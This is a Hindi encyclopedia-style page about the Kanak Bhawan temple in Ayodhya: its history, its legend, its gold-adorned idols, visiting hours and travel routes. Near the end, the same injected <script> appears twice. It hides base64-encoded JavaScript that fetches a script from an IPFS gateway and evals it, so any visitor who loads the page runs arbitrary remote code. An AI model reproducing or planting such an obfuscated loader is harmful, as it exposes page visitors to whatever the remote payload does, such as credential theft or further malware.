कनक भवन, अयोध्या

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

कनक भवन अयोध्या, उत्तर प्रदेश में राम जन्मभूमि के उत्तर-पूर्व में स्थित मंदिर है जो अपनी कलाकृति के लिए प्रसिद्ध है। टीकमगढ़ (अब मध्य प्रदेश) की रानी ​​वृषभानु कुमारी द्वारा निर्मित कनक भवन का सुंदर मंदिर राम और उनकी पत्नी देवी सीता को समर्पित है।

  • राजस्थान और बुंदेलखंड क्षेत्र के भव्य महलों से आश्चर्यजनक समानता रखने वाले इस मंदिर को अक्सर ‘सोने का घर मंदिर' के नाम से भी जाना जाता है।
  • किंवदंती है कि यह मंदिर भगवान राम की सौतेली माँ, रानी कैकेयी द्वारा देवी सीता को तब उपहार में दिया गया था, जब भगवान राम से विवाह होने के बाद वे अयोध्या पहुंची थीं।
  • मंदिर के केंद्रीय हॉल में तीन तरफ मेहराबदार दरवाजे हैं और इसके गर्भगृह में भगवान राम और देवी सीता की सोने के मुकुट से सजी मूर्तियां स्थापित हैं।
  • मूर्तियों को सोने के वज़नदार आभूषणों के साथ खूबसूरती से सजाया गया है।
  • चूंकि सोने का एक पर्यायवाची ‘कनक’ भी है, यही वजह है कि इस मंदिर को 'कनक भवन' कहा जाता है।
  • मंदिर में सप्ताह के सभी दिनों में सुबह 8 बजे से 11.30 बजे और शाम 4.30 बजे से 9 बजे तक जाया जा सकता है।

कैसे पहुंचें

वायुमार्ग

लखनऊ अंतर्राष्ट्रीय हवाई अड्डा निकटतम हवाई अड्डा है जो अयोध्या से 152 किलोमीटर दूर है। फैजाबाद-गोरखपुर से लगभग 158 किलोमीटर, प्रयागराज से 172 किलोमीटर और वाराणसी से 224 किलोमीटर दूर है।

रेलमार्ग

फैजाबाद व अयोध्या जिले के प्रमुख रेलवे स्टेशन लगभग सभी प्रमुख महानगरों एवं नगरों से भलि-भांति जुड़े हैं। फैजाबाद रेलमार्ग द्वारा लखनऊ से 128 कि.मी., गोरखपुर से 171 कि.मी., प्रयागराज से 157 कि.मी. एवं वाराणसी से 196 कि.मी. है। अयोध्या रेलमार्ग द्वारा लखनऊ से 135 कि.मी., गोरखपुर से 164 कि.मी., प्रयागराज से 164 कि.मी. एवं वाराणासी से 189 कि.मी. है।

सड़कमार्ग

उत्तर प्रदेश परिवहन निगम की सेवा 24 घंटे उपलब्ध हैं, और सभी छोटे बड़े स्थान से यहां पहुंचना बहुत आसान है। फैजाबाद बस मार्ग द्वारा लखनऊ से 152 कि.मी., गोरखपुर से 158 कि.मी., इलाहाबाद से 172 कि.मी. एवं वाराणसी से 224 कि.मी. है। अयोध्या बस मार्ग द्वारा लखनऊ से 172 कि.मी., गोरखपुर से 138 कि.मी., प्रयागराज से 192 कि.मी. एवं वाराणासी से 244 कि.मी. है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>